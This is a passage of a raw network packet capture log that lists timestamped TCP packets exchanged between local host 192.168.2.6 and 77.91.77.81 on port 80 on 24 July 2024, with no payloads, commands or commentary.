                                                                                        Jul 24, 2024 07:14:27.680895090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.680916071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.680962086 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686065912 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686132908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686166048 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686188936 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686196089 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686211109 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686228991 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686264038 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686270952 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686415911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686450005 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686460972 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686482906 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686492920 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686517000 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686548948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686561108 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686582088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686593056 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686614990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686625004 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686647892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.686654091 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.686688900 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688416958 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688473940 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688477993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688522100 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688565016 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688596964 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688606977 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688631058 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688638926 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688663960 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688678026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688695908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688709021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688729048 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688739061 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688767910 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688801050 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688812017 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688832998 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688865900 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688877106 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688899040 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688920021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688931942 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688949108 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.688963890 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.688971043 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689002037 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689212084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689245939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689256907 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689279079 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689291954 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689312935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689318895 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689346075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689379930 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689390898 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689408064 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689452887 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689790010 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689845085 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.689910889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689944983 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.689986944 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.690148115 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.690181017 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.690200090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.690212965 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.690226078 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.690247059 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.690256119 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.690288067 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.702030897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.702083111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.702085972 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.702119112 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.702131033 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.702169895 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.702837944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.702886105 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.702919960 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.702920914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.702941895 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.702959061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.703006029 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.703156948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.703191996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.703227997 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.703238964 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.703263998 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.703274012 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.703301907 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705120087 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705154896 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705180883 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705188990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705213070 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705221891 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705235004 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705257893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705277920 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705291033 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705305099 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705326080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705358982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705377102 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705391884 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705405951 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705426931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705434084 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705460072 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705492973 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705511093 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705539942 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705566883 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705600977 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705614090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705635071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705645084 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705668926 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705679893 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705703974 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.705713987 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.705749035 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.706401110 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.706450939 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.706454992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.706490040 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.706523895 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.706532955 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.706557035 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.706589937 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.706631899 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.706631899 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.706631899 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.707360983 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.707396030 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.707423925 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.707428932 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.707447052 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.707465887 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.707490921 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.707499027 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.707515001 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.707550049 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.708165884 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.708204031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.708214998 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.711009979 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.712757111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.712877989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.712892056 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.712912083 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.712959051 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.713036060 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713071108 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713104963 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713120937 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.713140011 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713187933 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.713824987 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713859081 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713882923 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.713891983 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713910103 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.713927031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.713947058 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.713967085 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.714184046 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.714219093 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.714251995 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.714263916 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.714309931 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.774214029 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.774281979 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.774394035 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.774427891 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.774441957 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.774473906 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.774497986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.774530888 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.774542093 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.774573088 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.774816990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.774849892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.774862051 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.774893045 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.775202990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.775235891 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.775269032 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.775279999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.775304079 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.775317907 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.775340080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.775387049 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.776079893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.776113987 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.776145935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.776156902 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.776181936 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.776186943 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.776216030 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.776259899 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.777007103 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777040005 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777072906 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777091026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.777105093 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777117014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.777139902 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777173042 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777184963 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.777816057 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777849913 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777863026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.777883053 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777892113 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.777919054 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777951002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.777964115 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.777987003 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.778029919 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.778733969 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.778819084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.778852940 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.778882027 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.778882027 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.778886080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.778898001 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.778919935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.778950930 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.778992891 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.779593945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.779630899 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.779665947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.779684067 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.779700994 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.779716015 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.779735088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.779746056 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.779769897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.779815912 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.780544996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.780580997 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.780613899 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.780641079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.780647993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.780658960 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.780682087 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.780689955 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.780725956 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.781408072 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.781443119 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.781470060 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.781476021 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.781496048 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.781510115 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.781518936 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.781543016 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.781549931 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.781575918 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.781580925 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.781625032 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.782108068 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.782141924 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.782174110 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.782196999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.782207966 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.782228947 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.782253981 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.790806055 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.790966034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.790999889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791021109 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791038036 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791058064 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791244984 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791279078 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791290045 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791311979 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791321993 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791347027 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791357994 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791388988 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791785002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791829109 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791863918 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791899920 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791909933 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791934013 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.791943073 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.791969061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792013884 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.792695999 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792732000 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792764902 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792778015 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.792798042 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792805910 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.792831898 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792864084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792876005 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.792896986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.792947054 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.793540955 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.793576002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.793585062 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.793605089 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.793638945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.793651104 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.793673038 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.793678999 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.793704033 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.793714046 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.793737888 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.793744087 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.793783903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.794338942 CEST804971877.91.77.81192.168.2.6
